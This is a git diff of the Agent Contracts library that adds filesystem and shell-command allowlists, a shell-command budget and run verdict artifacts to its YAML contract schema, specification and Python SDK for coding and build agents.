--- a/schemas/agent-contract.schema.json +++ b/schemas/agent-contract.schema.json @@ -4,7 +4,11 @@ "title": "Agent Contract", 
"description": "YAML specification for enforceable agent behavioral contracts. Supports three graduated tiers: Standalone (Tier 0), Enforceable (Tier 1), and Composable (Tier 2).", "type": "object", - "required": ["agent_contract", "identity", "contract"], + "required": [ + "agent_contract", + "identity", + "contract" + ], "additionalProperties": true, "patternProperties": { "^x-": { @@ -54,7 +58,10 @@ "$defs": { "Identity": { "type": "object", - "required": ["name", "version"], + "required": [ + "name", + "version" + ], "additionalProperties": true, "properties": { "name": { @@ -73,27 +80,36 @@ }, "authors": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "List of agent authors or maintainers." } } }, "Contract": { "type": "object", - "required": ["postconditions"], + "required": [ + "postconditions" + ], "additionalProperties": true, "properties": { "postconditions": { "type": "array", "minItems": 1, - "items": { "$ref": "#/$defs/Postcondition" }, + "items": { + "$ref": "#/$defs/Postcondition" + }, "description": "At least one machine-checkable output guarantee. This is what makes it a contract, not a README." } } }, "Postcondition": { "type": "object", - "required": ["name", "check"], + "required": [ + "name", + "check" + ], "additionalProperties": true, "properties": { "name": { @@ -108,13 +124,21 @@ }, "enforcement": { "type": "string", - "enum": ["sync_block", "sync_warn", "async_monitor"], + "enum": [ + "sync_block", + "sync_warn", + "async_monitor" + ], "default": "sync_warn", "description": "When and how this check runs. sync_block: fails the invocation. sync_warn: logs warning. async_monitor: evaluates asynchronously." }, "severity": { "type": "string", - "enum": ["critical", "major", "minor"], + "enum": [ + "critical", + "major", + "minor" + ], "default": "major", "description": "Impact level when this postcondition fails." 
}, @@ -155,11 +179,20 @@ "type": "array", "items": { "type": "object", - "required": ["name", "check"], + "required": [ + "name", + "check" + ], "properties": { - "name": { "type": "string" }, - "check": { "type": "string" }, - "description": { "type": "string" } + "name": { + "type": "string" + }, + "check": { + "type": "string" + }, + "description": { + "type": "string" + } } }, "description": "Preconditions that must hold before the agent runs." @@ -190,44 +223,62 @@ }, "EffectsAuthorized": { "type": "object", - "description": "Capability scope — what the agent MAY do. Default: deny all. Composes via intersection during delegation.", + "description": "Capability scope \u2014 what the agent MAY do. Default: deny all. Composes via intersection during delegation.", "additionalProperties": true, "properties": { "tools": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Allowlist of tool names or glob patterns (e.g., 'database.*'). Tools not listed are BLOCKED." }, "network": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Allowed network egress URL patterns (e.g., 'https://api.example.com/*')." }, "state_writes": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Allowed state write scope patterns (e.g., 'tickets.*', 'user.preferences')." + }, + "filesystem": { + "$ref": "#/$defs/FilesystemAuthorization" + }, + "shell": { + "$ref": "#/$defs/ShellAuthorization" } } }, "EffectsDeclared": { "type": "object", - "description": "Effect footprint — what side effects actually occur. Composes via union for auditing. Runtime enforces declared ⊆ authorized.", + "description": "Effect footprint \u2014 what side effects actually occur. Composes via union for auditing. 
Runtime enforces declared \u2286 authorized.", "additionalProperties": true, "properties": { "tools": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Tools that this agent actually invokes." }, "network": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Network endpoints this agent actually contacts." }, "state_writes": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "State scopes this agent actually modifies." } } @@ -260,6 +311,11 @@ "type": "number", "exclusiveMinimum": 0, "description": "Maximum wall-clock time in seconds per invocation." + }, + "max_shell_commands": { + "type": "integer", + "exclusiveMinimum": 0, + "description": "Maximum number of shell commands per invocation." } } } @@ -274,7 +330,9 @@ "type": "array", "items": { "type": "object", - "required": ["name"], + "required": [ + "name" + ], "additionalProperties": true, "properties": { "name": { @@ -346,7 +404,9 @@ }, "allowed_agents": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Allowlist of agent names that can be delegated to." 
} } @@ -359,32 +419,64 @@ "traces": { "type": "object", "properties": { - "enabled": { "type": "boolean", "default": true }, - "sample_rate": { "type": "number", "minimum": 0, "maximum": 1 } + "enabled": { + "type": "boolean", + "default": true + }, + "sample_rate": { + "type": "number", + "minimum": 0, + "maximum": 1 + } } }, "metrics": { "type": "array", "items": { "type": "object", - "required": ["name", "type"], + "required": [ + "name", + "type" + ], "properties": { - "name": { "type": "string" }, - "type": { "type": "string", "enum": ["counter", "histogram", "gauge"] }, - "description": { "type": "string" } + "name": { + "type": "string" + }, + "type": { + "type": "string", + "enum": [ + "counter", + "histogram", + "gauge" + ] + }, + "description": { + "type": "string" + } } } }, "violation_events": { "type": "object", "properties": { - "emit": { "type": "boolean", "default": true }, + "emit": { + "type": "boolean", + "default": true + }, "destination": { "type": "string", - "enum": ["stdout", "otel", "callback"], + "enum": [ + "stdout", + "otel", + "callback" + ], "default": "stdout" } } + }, + "run_artifact_path": { + "type": "string", + "description": "Repo-local verdict artifact path template. Supports {run_id}." } } }, @@ -399,7 +491,9 @@ }, "breaking_changes": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "List of breaking changes from the previous version." }, "substitution": { @@ -407,7 +501,9 @@ "properties": { "compatible_with": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Versions this agent can substitute for (Liskov-style)." 
} } @@ -422,22 +518,36 @@ "contract_satisfaction_rate": { "type": "object", "properties": { - "target": { "type": "number", "minimum": 0, "maximum": 1 }, - "window": { "type": "string" } + "target": { + "type": "number", + "minimum": 0, + "maximum": 1 + }, + "window": { + "type": "string" + } } }, "latency": { "type": "object", "properties": { - "p50_ms": { "type": "number" }, - "p99_ms": { "type": "number" } + "p50_ms": { + "type": "number" + }, + "p99_ms": { + "type": "number" + } } }, "cost": { "type": "object", "properties": { - "avg_usd": { "type": "number" }, - "p99_usd": { "type": "number" } + "avg_usd": { + "type": "number" + }, + "p99_usd": { + "type": "number" + } } }, "error_budget_policy": { @@ -445,6 +555,39 @@ "description": "Action when error budget is exhausted (e.g., 'freeze_deployments', 'alert_only')." } } + }, + "FilesystemAuthorization": { + "type": "object", + "additionalProperties": true, + "properties": { + "read": { + "type": "array", + "items": { + "type": "string" + }, + "description": "Repo-local read allowlist globs for coding/build agents." + }, + "write": { + "type": "array", + "items": { + "type": "string" + }, + "description": "Repo-local write allowlist globs for coding/build agents." + } + } + }, + "ShellAuthorization": { + "type": "object", + "additionalProperties": true, + "properties": { + "commands": { + "type": "array", + "items": { + "type": "string" + }, + "description": "Allowed shell command patterns (glob-style matching on normalized command strings)." + } + } } } } diff --git a/spec/SPECIFICATION.md b/spec/SPECIFICATION.md index a4cd901..87a3b23 100644 --- a/spec/SPECIFICATION.md +++ b/spec/SPECIFICATION.md @@ -2,258 +2,199 @@ ## Overview -An Agent Contract is a YAML document that declares what an agent **must do**, -**must not do**, and **what happens when it fails**. Contracts are enforced -at the runtime boundary by the SDK — never via prompts. 
+An Agent Contract is a repo-local YAML document that declares what an autonomous coding/build agent may do, what it must prove before a run is considered successful, and where the final verdict artifact should be written. -Contracts follow the **OpenAPI model**: a machine-readable document that -generates tooling leverage. Write a YAML file. Get cost control, tool-use -security, and audit trails. +The v0.1.0 surface is intentionally narrow: -## File Format +- authorize reads, writes, commands, tools, network, and state writes +- enforce resource budgets +- evaluate postconditions against outputs and recorded checks +- emit one durable verdict artifact for each run -Contracts are YAML files, typically named `AGENT_CONTRACT.yaml`. The SDK -also accepts any `.yaml` or `.yml` file. A JSON Schema is provided at -`schemas/agent-contract.schema.json` for editor support and machine validation. +## Core principles -### Forward Compatibility +1. **Repo-local first** — the contract belongs in the repository. +2. **Fail closed when configured** — coding/build scopes default to deny when present. +3. **One operator-readable verdict** — every meaningful run can end with one artifact. +4. **Host-agnostic core** — the contract is portable across local runtimes and CI. -- Unknown fields are **ignored** (must-ignore semantics) -- Extension fields use the `x-` prefix (e.g., `x-hipaa-compliance: true`) -- Spec version (`agent_contract` field) follows semver +## File format ---- +Contracts are YAML files, typically named `AGENT_CONTRACT.yaml`. +Unknown fields are ignored for forward compatibility. Extension fields use the `x-` prefix. -## Three Tiers - -Contracts use graduated tiers. Start simple, add guarantees as production demands. - -### Tier 0: Standalone (4 fields) - -**Purpose:** Self-documentation + local validation. Value without any runtime. 
- -| Field | Type | Required | Description | -|-------|------|----------|-------------| -| `agent_contract` | semver string | Yes | Spec version (e.g., `"0.1.0"`) | -| `identity.name` | string | Yes | Unique agent identifier | -| `identity.version` | semver string | Yes | Agent implementation version | -| `contract.postconditions[]` | array (min 1) | Yes | Machine-checkable output guarantees | - -A Tier 0 contract is useful on its own: it documents what the agent guarantees -and can be validated locally with `aicontracts validate`. - -### Tier 1: Enforceable (adds runtime value) - -Everything in Tier 0, plus: - -| Field | What It Solves | -|-------|---------------| -| `inputs.schema` | Reject malformed inputs before execution (JSON Schema) | -| `outputs.schema` | Validate structured output, catch schema drift (JSON Schema) | -| `effects.authorized` | Default-deny tool allowlist + network + state writes | -| `resources.budgets` | `max_cost_usd`, `max_tokens`, `max_tool_calls`, `max_duration_seconds` | - -The SDK enforces Tier 1 fields at the boundary: input validation, tool gating, -budget circuit breakers, and output validation. 
- -### Tier 2: Composable (adds multi-agent + compliance value) - -Everything in Tier 1, plus: +```yaml +agent_contract: "0.1.0" +identity: + name: repo-build-agent + version: "0.1.0" +contract: + postconditions: + - name: produces_output + check: "output is not None" +``` -| Field | What It Solves | -|-------|---------------| -| `failure_model` | Typed errors with retry/fallback semantics | -| `effects.declared` | Effect footprint for audit trails (composes via union) | -| `delegation` | Max depth, attenuation rules, sub-agent requirements | -| `observability` | Required OTel spans/events + violation event schema | -| `versioning` | Content-addressed build ID + breaking change rules | -| `slo` | Target rates for contract satisfaction, latency, cost | +## Tiers ---- +### Tier 0 — Standalone -## Field Reference +Required fields: -### `agent_contract` (required) +- `agent_contract` +- `identity.name` +- `identity.version` +- `contract.postconditions[]` -```yaml -agent_contract: "0.1.0" -``` +### Tier 1 — Enforceable -Spec version. Enables forward compatibility. +Adds runtime enforcement value: -### `identity` (required) +- `inputs.schema` +- `outputs.schema` +- `effects.authorized` +- `resources.budgets` -```yaml -identity: - name: support-triage-agent - version: "2.1.0" - description: Triages support tickets by priority. - authors: - - Piyush Vyas -``` +Tier 1 is where coding/build guardrails live. -### `contract.postconditions` (required, min 1) +### Tier 2 — Composable -```yaml -contract: - postconditions: - - name: valid_priority - check: 'output.priority in ["critical", "high", "medium", "low"]' - enforcement: sync_block # sync_block | sync_warn | async_monitor - severity: critical # critical | major | minor - description: Priority must be valid. 
- slo: - target_rate: 0.995 - window: "24h" -``` +Adds broader composition and observability features: -**Enforcement timing:** -- `sync_block`: Fails the invocation if the check fails -- `sync_warn`: Logs a warning, emits a violation event, but allows the result -- `async_monitor`: Deferred evaluation (e.g., LLM-as-judge quality checks) +- `failure_model` +- `effects.declared` +- `delegation` +- `observability` +- `versioning` +- `slo` -**Check syntax:** CEL-like expressions evaluated safely (no `eval()`): -- `output is not None` -- `output.status == "resolved"` -- `output.status in ["resolved", "escalated"]` -- `len(output.items) > 0` -- `output.score >= 0.8` -- `eval:judge` (LLM-as-judge, async only in v0.1) +## Authorized effects -### `effects` (Tier 1+) +`effects.authorized` declares what the agent may do. ```yaml effects: - authorized: # Capability scope — what the agent MAY do + authorized: tools: - search - - database.* # Glob patterns supported network: - "https://api.example.com/*" state_writes: - "tickets.*" - - declared: # Effect footprint — what actually happens (Tier 2) - tools: - - search - network: - - "https://api.example.com/search" - state_writes: - - "tickets.priority" + filesystem: + read: ["src/**", "tests/**", "README.md"] + write: ["src/**", "tests/**"] + shell: + commands: + - "python -m pytest *" + - "python -m ruff check *" ``` -**Key rules:** -- `effects.authorized` is **default-deny**: tools not listed are blocked -- During delegation, authorized effects compose via **intersection** (capabilities attenuate) -- Declared effects compose via **union** (footprint accumulates) -- Runtime enforces: `declared ⊆ authorized` +Rules: + +- tools, network, and state writes are default-deny when configured +- filesystem read/write scopes are default-deny when configured +- shell commands are matched against normalized command strings with glob patterns +- during delegation, authorized effects attenuate by intersection -### `resources.budgets` (Tier 
1+) +## Budgets ```yaml resources: budgets: - max_cost_usd: 0.50 - max_tokens: 15000 + max_cost_usd: 1.00 + max_tokens: 50000 max_tool_calls: 20 - max_duration_seconds: 30.0 + max_shell_commands: 10 + max_duration_seconds: 1800 ``` -Per-invocation limits. The SDK trips a circuit breaker when any threshold is exceeded. +`max_shell_commands` is specific to coding/build workflows and complements tool-call budgets. -### `failure_model` (Tier 2) +## Postconditions and recorded checks + +Postconditions are safe expression checks evaluated against `output` plus any extra context provided by the runtime. ```yaml -failure_model: - errors: - - name: timeout - retryable: true - max_retries: 3 - - name: rate_limit - retryable: true - max_retries: 2 - fallback: queue-agent - default_timeout_seconds: 30.0 - circuit_breaker: - failure_threshold: 5 - reset_timeout_seconds: 60.0 +contract: + postconditions: + - name: repo_checks_green + check: "checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0" + enforcement: sync_block + severity: critical ``` -### `delegation` (Tier 2) +Supported expression forms include: -```yaml -delegation: - max_depth: 2 - attenuate_effects: true # Intersect authorized effects during delegation - require_contract: true # Sub-agents must have their own contract - allowed_agents: - - cache-agent - - summarizer -``` +- `output is not None` +- `output.status == "ok"` +- `output.status in ["ok", "warn"]` +- `len(output.items) > 0` +- `checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0` -### `observability` (Tier 2) +## Observability and verdict artifacts ```yaml observability: - traces: - enabled: true - sample_rate: 1.0 - metrics: - - name: latency_ms - type: histogram - violation_events: - emit: true - destination: otel # stdout | otel | callback + run_artifact_path: ".agent-contracts/runs/{run_id}/verdict.json" ``` -### `versioning` (Tier 2) +The path may contain `{run_id}`. 
+If omitted, runtimes may default to `.agent-contracts/runs/{run_id}/verdict.json`. -```yaml -versioning: - build_id: "sha256:abc123..." - breaking_changes: [] - substitution: - compatible_with: - - "1.0.0" -``` +Verdict artifacts include: -### `slo` (Tier 2) +- contract identity + spec version +- host identity +- `outcome`: `pass | warn | blocked | fail` +- `final_gate`: `allowed | blocked | failed` +- violations +- executed checks +- budget snapshot +- artifact metadata -```yaml -slo: - contract_satisfaction_rate: - target: 0.995 - window: "24h" - latency: - p50_ms: 500 - p99_ms: 5000 - cost: - avg_usd: 0.10 - p99_usd: 0.50 - error_budget_policy: freeze_deployments -``` +## Outcome semantics ---- +- `pass` — required checks and blocking clauses passed +- `warn` — non-blocking warnings were recorded +- `blocked` — an effect or budget violation denied the run in-flight +- `fail` — the run completed, but required checks or critical postconditions failed -## Breaking Change Rules +## Example coding-agent contract -For the v0.x series: -- Adding optional fields is **not** a breaking change -- Removing or renaming fields **is** a breaking change -- Changing field semantics **is** a breaking change -- Adding new required fields **is** a breaking change +```yaml +agent_contract: "0.1.0" +identity: + name: repo-build-agent + version: "0.1.0" +contract: + postconditions: + - name: repo_checks_green + check: "checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0" + enforcement: sync_block + severity: critical +effects: + authorized: + filesystem: + read: ["src/**", "tests/**", "README.md"] + write: ["src/**", "tests/**"] + shell: + commands: + - "python -m pytest *" + - "python -m ruff check *" +resources: + budgets: + max_shell_commands: 10 +observability: + run_artifact_path: ".agent-contracts/runs/{run_id}/verdict.json" +``` -From v1.0 onward: no breaking changes within a major version. 
+## Compatibility notes ---- +Within v0.1.0: -## Positioning +- adding optional fields is backward-compatible +- removing fields is breaking +- changing field semantics is breaking +- new required fields are breaking -| Layer | What It Does | What Contracts Add | -|-------|-------------|-------------------| -| **MCP** | Tool transport (JSON-RPC) | Policy layer above transport | -| **Agent Skills** | Capability discovery (Markdown) | Machine-enforceable guarantees | -| **A2A** | Agent discovery and routing | Behavioral guarantees on routes | -| **AWS AgentCore** | Cedar policy enforcement | Portable, open spec | -| **LangChain/CrewAI** | Agent orchestration | Declarative, out-of-process enforcement | -| **OpenAPI** | Structural API contracts | Behavioral contracts for non-deterministic agents | +This repo intentionally does **not** use v0.1.0 to broaden into hosted policy platforms or generic agent governance. diff --git a/src/agent_contracts/__init__.py b/src/agent_contracts/__init__.py index 7a9bd09..0f0f427 100644 --- a/src/agent_contracts/__init__.py +++ b/src/agent_contracts/__init__.py @@ -1,4 +1,4 @@ -"""Agent Contracts — YAML spec + validation SDK for production agent reliability. +"""Agent Contracts — repo-local contracts for coding/build agents. 
Quick start: from agent_contracts import load_contract, ContractEnforcer @@ -6,15 +6,23 @@ contract = load_contract("AGENT_CONTRACT.yaml") with ContractEnforcer(contract) as enforcer: enforcer.check_tool_call("search") - enforcer.add_cost(0.05) + enforcer.check_file_write("src/app.py") + enforcer.check_shell_command("python -m pytest tests/") enforcer.evaluate_postconditions(result) + enforcer.finalize_run(output=result) """ from agent_contracts._version import __version__ from agent_contracts.budgets import BudgetExceededError, BudgetTracker from agent_contracts.composition import CompatibilityReport, check_compatibility from agent_contracts.effects import EffectDeniedError, EffectGuard -from agent_contracts.enforcer import ContractEnforcer, ContractViolation, enforce_contract +from agent_contracts.enforcer import ( + ContractEnforcer, + ContractViolation, + RunCheckResult, + RunVerdict, + enforce_contract, +) from agent_contracts.loader import ContractLoadError, load_contract, validate_contract from agent_contracts.postconditions import PostconditionError, PreconditionError from agent_contracts.tier import TierRecommendation, assess_tier, recommend_upgrades @@ -25,10 +33,12 @@ EffectsAuthorized, EffectsDeclared, FailureModel, + FilesystemAuthorization, ObservabilityConfig, PostconditionDef, PreconditionDef, ResourceBudgets, + ShellAuthorization, SLOConfig, VersioningConfig, ) @@ -36,44 +46,39 @@ __all__ = [ "__version__", - # Core types "Contract", "ContractIdentity", "PostconditionDef", "PreconditionDef", "EffectsAuthorized", "EffectsDeclared", + "FilesystemAuthorization", + "ShellAuthorization", "ResourceBudgets", "DelegationRules", "FailureModel", "ObservabilityConfig", "VersioningConfig", "SLOConfig", - # Loading "load_contract", "validate_contract", "ContractLoadError", - # Tier "assess_tier", "recommend_upgrades", "TierRecommendation", - # Enforcement "ContractEnforcer", "ContractViolation", + "RunCheckResult", + "RunVerdict", "enforce_contract", - # 
Effects "EffectGuard", "EffectDeniedError", - # Budgets "BudgetTracker", "BudgetExceededError", - # Postconditions "PostconditionError", "PreconditionError", - # Violations "ViolationEvent", "ViolationEmitter", - # Composition "check_compatibility", "CompatibilityReport", ] diff --git a/src/agent_contracts/_version.py b/src/agent_contracts/_version.py index 3cd27c7..ce692bc 100644 --- a/src/agent_contracts/_version.py +++ b/src/agent_contracts/_version.py @@ -1,3 +1,3 @@ """Agent Contracts version.""" -__version__ = "0.1.1" +__version__ = "0.2.0" diff --git a/src/agent_contracts/adapters/claude_agent.py b/src/agent_contracts/adapters/claude_agent.py index 688b419..e6b6e0a 100644 --- a/src/agent_contracts/adapters/claude_agent.py +++ b/src/agent_contracts/adapters/claude_agent.py @@ -1,4 +1,4 @@ -"""Claude Agent SDK adapter — contract enforcement via hooks. +"""Claude Agent SDK adapter — repo-local contract enforcement via hooks. Usage (3 lines): from agent_contracts.adapters.claude_agent import ContractHooks diff --git a/src/agent_contracts/adapters/crewai.py b/src/agent_contracts/adapters/crewai.py index 79b178a..b84f5f5 100644 --- a/src/agent_contracts/adapters/crewai.py +++ b/src/agent_contracts/adapters/crewai.py @@ -100,6 +100,6 @@ def wrapped(*args: Any, **kwargs: Any) -> Any: self._enforcer.check_tool_call(tool_name) return tool_fn(*args, **kwargs) - wrapped.__name__ = tool_fn.__name__ # type: ignore[attr-defined] + wrapped.__name__ = tool_fn.__name__ wrapped.__doc__ = tool_fn.__doc__ return wrapped diff --git a/src/agent_contracts/adapters/openai_agents.py b/src/agent_contracts/adapters/openai_agents.py index fad45d0..3519473 100644 --- a/src/agent_contracts/adapters/openai_agents.py +++ b/src/agent_contracts/adapters/openai_agents.py @@ -1,4 +1,4 @@ -"""OpenAI Agents SDK adapter — contract enforcement via RunHooks. +"""OpenAI Agents SDK adapter — repo-local contract enforcement via RunHooks. 
Usage (3 lines): from agent_contracts.adapters.openai_agents import ContractRunHooks diff --git a/src/agent_contracts/adapters/pydantic_ai.py b/src/agent_contracts/adapters/pydantic_ai.py index 442ca72..f2e89e4 100644 --- a/src/agent_contracts/adapters/pydantic_ai.py +++ b/src/agent_contracts/adapters/pydantic_ai.py @@ -116,6 +116,6 @@ def wrapped(*args: Any, **kwargs: Any) -> Any: self._enforcer.check_tool_call(tool_name) return tool_fn(*args, **kwargs) - wrapped.__name__ = tool_fn.__name__ # type: ignore[attr-defined] + wrapped.__name__ = tool_fn.__name__ wrapped.__doc__ = tool_fn.__doc__ return wrapped diff --git a/src/agent_contracts/budgets.py b/src/agent_contracts/budgets.py index ae87c51..a63b44c 100644 --- a/src/agent_contracts/budgets.py +++ b/src/agent_contracts/budgets.py @@ -1,6 +1,6 @@ """Budget enforcement — per-invocation resource limits with circuit breaker. -Thread-safe counters for cost, tokens, tool calls, and elapsed time. +Thread-safe counters for cost, tokens, tool calls, shell commands, and elapsed time. """ from __future__ import annotations @@ -32,37 +32,28 @@ class BudgetSnapshot: cost_usd: float = 0.0 tokens: int = 0 tool_calls: int = 0 + shell_commands: int = 0 elapsed_seconds: float = 0.0 class BudgetTracker: - """Thread-safe budget tracker with circuit breaker. - - Tracks cost, tokens, tool calls, and elapsed time against configured limits. - Raises BudgetExceededError when a threshold is hit. - """ + """Thread-safe budget tracker with circuit breaker.""" def __init__( self, budgets: Optional[ResourceBudgets] = None, cost_callback: Optional[Callable[[], float]] = None, ) -> None: - """ - Args: - budgets: Resource limits to enforce. None = no enforcement. - cost_callback: Optional callable that returns current accumulated cost. - If not provided, cost must be reported via add_cost(). 
- """ self._budgets = budgets self._cost_callback = cost_callback self._lock = threading.Lock() self._cost_usd: float = 0.0 self._tokens: int = 0 self._tool_calls: int = 0 + self._shell_commands: int = 0 self._start_time: float = time.monotonic() def _safe_cost_callback(self) -> float: - """Call cost callback safely, falling back to internal counter on error.""" if self._cost_callback: try: return self._cost_callback() @@ -72,22 +63,20 @@ def _safe_cost_callback(self) -> float: @property def is_configured(self) -> bool: - """Whether any budget limits are configured.""" return self._budgets is not None def snapshot(self) -> BudgetSnapshot: - """Get a thread-safe snapshot of current consumption.""" with self._lock: cost = self._safe_cost_callback() return BudgetSnapshot( cost_usd=cost, tokens=self._tokens, tool_calls=self._tool_calls, + shell_commands=self._shell_commands, elapsed_seconds=time.monotonic() - self._start_time, ) def add_cost(self, amount: float) -> None: - """Record cost and check against limit.""" if amount < 0: raise ValueError("Cost amount must be non-negative.") with self._lock: @@ -95,7 +84,6 @@ def add_cost(self, amount: float) -> None: self._check_cost() def add_tokens(self, count: int) -> None: - """Record token usage and check against limit.""" if count < 0: raise ValueError("Token count must be non-negative.") with self._lock: @@ -103,21 +91,24 @@ def add_tokens(self, count: int) -> None: self._check_tokens() def record_tool_call(self) -> None: - """Record a tool call and check against limit.""" with self._lock: self._tool_calls += 1 self._check_tool_calls() + def record_shell_command(self) -> None: + with self._lock: + self._shell_commands += 1 + self._check_shell_commands() + def check_all(self) -> None: - """Check all budget limits. 
Raises BudgetExceededError on first violation.""" with self._lock: self._check_cost() self._check_tokens() self._check_tool_calls() + self._check_shell_commands() self._check_duration() def check_duration(self) -> None: - """Check elapsed time against limit.""" with self._lock: self._check_duration() @@ -143,6 +134,15 @@ def _check_tool_calls(self) -> None: float(self._budgets.max_tool_calls), ) + def _check_shell_commands(self) -> None: + if self._budgets and self._budgets.max_shell_commands is not None: + if self._shell_commands > self._budgets.max_shell_commands: + raise BudgetExceededError( + "shell_commands", + float(self._shell_commands), + float(self._budgets.max_shell_commands), + ) + def _check_duration(self) -> None: if self._budgets and self._budgets.max_duration_seconds is not None: elapsed = time.monotonic() - self._start_time @@ -152,9 +152,9 @@ def _check_duration(self) -> None: ) def reset(self) -> None: - """Reset all counters and restart the timer.""" with self._lock: self._cost_usd = 0.0 self._tokens = 0 self._tool_calls = 0 + self._shell_commands = 0 self._start_time = time.monotonic() diff --git a/src/agent_contracts/cli.py b/src/agent_contracts/cli.py index b0cb337..fe89f54 100644 --- a/src/agent_contracts/cli.py +++ b/src/agent_contracts/cli.py @@ -1,4 +1,4 @@ -"""CLI for Agent Contracts — validate, check-compat, init, test.""" +"""CLI for Agent Contracts — repo-local guardrails for coding/build agents.""" from __future__ import annotations @@ -11,12 +11,13 @@ import yaml from agent_contracts._version import __version__ +from agent_contracts.enforcer import load_verdict_artifact @click.group() @click.version_option(version=__version__, prog_name="aicontracts") def main() -> None: - """Agent Contracts — YAML spec + SDK for production agent reliability.""" + """Agent Contracts — repo-local fail-closed guardrails for coding/build agents.""" pass @@ -25,25 +26,25 @@ def main() -> None: @click.option("--json-output", "-j", is_flag=True, 
help="Output as JSON.") def validate(contract_path: str, json_output: bool) -> None: """Validate a contract YAML file against the spec.""" - from agent_contracts.loader import ( - ContractLoadError, - load_contract_yaml, - validate_contract, - ) + from agent_contracts.loader import ContractLoadError, load_contract_yaml, validate_contract from agent_contracts.tier import assess_tier, recommend_upgrades try: data = load_contract_yaml(contract_path) - except ContractLoadError as e: - click.echo(f"Error: {e}", err=True) + except ContractLoadError as exc: + click.echo(f"Error: {exc}", err=True) sys.exit(1) errors = validate_contract(data) tier = assess_tier(data) recommendations = recommend_upgrades(data, tier) - tier_names = {0: "Standalone", 1: "Enforceable", 2: "Composable"} + authorized = data.get("effects", {}).get("authorized", {}) + filesystem = authorized.get("filesystem", {}) if isinstance(authorized, dict) else {} + shell = authorized.get("shell", {}) if isinstance(authorized, dict) else {} + observability = data.get("observability", {}) + if json_output: result = { "valid": len(errors) == 0, @@ -51,33 +52,45 @@ def validate(contract_path: str, json_output: bool) -> None: "tier_name": tier_names.get(tier, "Unknown"), "errors": errors, "recommendations": [ - {"field": r.field, "target_tier": r.target_tier, "reason": r.reason} - for r in recommendations + { + "field": item.field, + "target_tier": item.target_tier, + "reason": item.reason, + } + for item in recommendations ], + "coding_surfaces": { + "filesystem_read": filesystem.get("read", []), + "filesystem_write": filesystem.get("write", []), + "shell_commands": shell.get("commands", []), + "run_artifact_path": observability.get("run_artifact_path"), + }, } click.echo(json.dumps(result, indent=2)) else: identity = data.get("identity", {}) - name = identity.get("name", "unknown") - version = identity.get("version", "?") - - click.echo(f"Contract: {name}@{version}") + click.echo(f"Contract: 
{identity.get('name', 'unknown')}@{identity.get('version', '?')}") click.echo(f"Spec version: {data.get('agent_contract', '?')}") - if errors: click.echo(f"\nValidation: FAILED ({len(errors)} error(s))") - for e in errors: - click.echo(f" - {e}") + for error in errors: + click.echo(f" - {error}") sys.exit(1) - else: - click.echo("\nValidation: PASSED") - + click.echo("\nValidation: PASSED") click.echo(f"Tier: {tier} ({tier_names.get(tier, 'Unknown')})") - + if filesystem or shell or observability.get("run_artifact_path"): + click.echo("\nCoding/build surfaces:") + if filesystem: + click.echo(f" read: {filesystem.get('read', [])}") + click.echo(f" write: {filesystem.get('write', [])}") + if shell: + click.echo(f" shell: {shell.get('commands', [])}") + if observability.get("run_artifact_path"): + click.echo(f" verdict artifact: {observability['run_artifact_path']}") if recommendations: click.echo(f"\nRecommendations to reach Tier {tier + 1}:") - for r in recommendations: - click.echo(f" + {r.field}: {r.reason}") + for item in recommendations: + click.echo(f" + {item.field}: {item.reason}") if errors: sys.exit(1) @@ -95,23 +108,30 @@ def check_compat(producer_path: str, consumer_path: str, json_output: bool) -> N try: producer = load_contract(producer_path) consumer = load_contract(consumer_path) - except ContractLoadError as e: - click.echo(f"Error: {e}", err=True) + except ContractLoadError as exc: + click.echo(f"Error: {exc}", err=True) sys.exit(1) report = check_compatibility(producer, consumer) - if json_output: result = { "compatible": report.compatible, "producer": report.producer, "consumer": report.consumer, - "schema_gaps": [{"field": g.field_path, "issue": g.issue} for g in report.schema_gaps], - "capability_gaps": [{"tool": g.tool, "reason": g.reason} for g in report.capability_gaps], + "schema_gaps": [ + {"field": gap.field_path, "issue": gap.issue} for gap in report.schema_gaps + ], + "capability_gaps": [ + {"tool": gap.tool, "reason": gap.reason} for 
gap in report.capability_gaps + ], "budget_gaps": [ - {"type": g.budget_type, "producer_limit": g.producer_limit, - "consumer_limit": g.consumer_limit, "issue": g.issue} - for g in report.budget_gaps + { + "type": gap.budget_type, + "producer_limit": gap.producer_limit, + "consumer_limit": gap.consumer_limit, + "issue": gap.issue, + } + for gap in report.budget_gaps ], "effect_violations": report.effect_violations, "warnings": report.warnings, @@ -119,44 +139,50 @@ def check_compat(producer_path: str, consumer_path: str, json_output: bool) -> N click.echo(json.dumps(result, indent=2)) else: click.echo(report.summary()) - if report.schema_gaps: click.echo("\nSchema gaps:") - for g in report.schema_gaps: - click.echo(f" - {g.field_path}: {g.issue}") - + for gap in report.schema_gaps: + click.echo(f" - {gap.field_path}: {gap.issue}") if report.capability_gaps: click.echo("\nCapability gaps:") - for g in report.capability_gaps: - click.echo(f" - {g.tool}: {g.reason}") - + for capability_gap in report.capability_gaps: + click.echo(f" - {capability_gap.tool}: {capability_gap.reason}") if report.budget_gaps: click.echo("\nBudget gaps:") - for g in report.budget_gaps: - click.echo(f" - {g.issue}") - + for budget_gap in report.budget_gaps: + click.echo(f" - {budget_gap.issue}") if report.effect_violations: click.echo("\nEffect violations:") - for v in report.effect_violations: - click.echo(f" - {v}") - + for violation in report.effect_violations: + click.echo(f" - {violation}") if report.warnings: click.echo("\nWarnings:") - for w in report.warnings: - click.echo(f" - {w}") + for warning in report.warnings: + click.echo(f" - {warning}") if not report.compatible: sys.exit(1) @main.command() -@click.option("--from-trace", "-t", "trace_path", type=click.Path(exists=True), - help="JSONL trace file to generate from.") +@click.option("--from-trace", "-t", "trace_path", type=click.Path(exists=True), help="JSONL trace file to generate 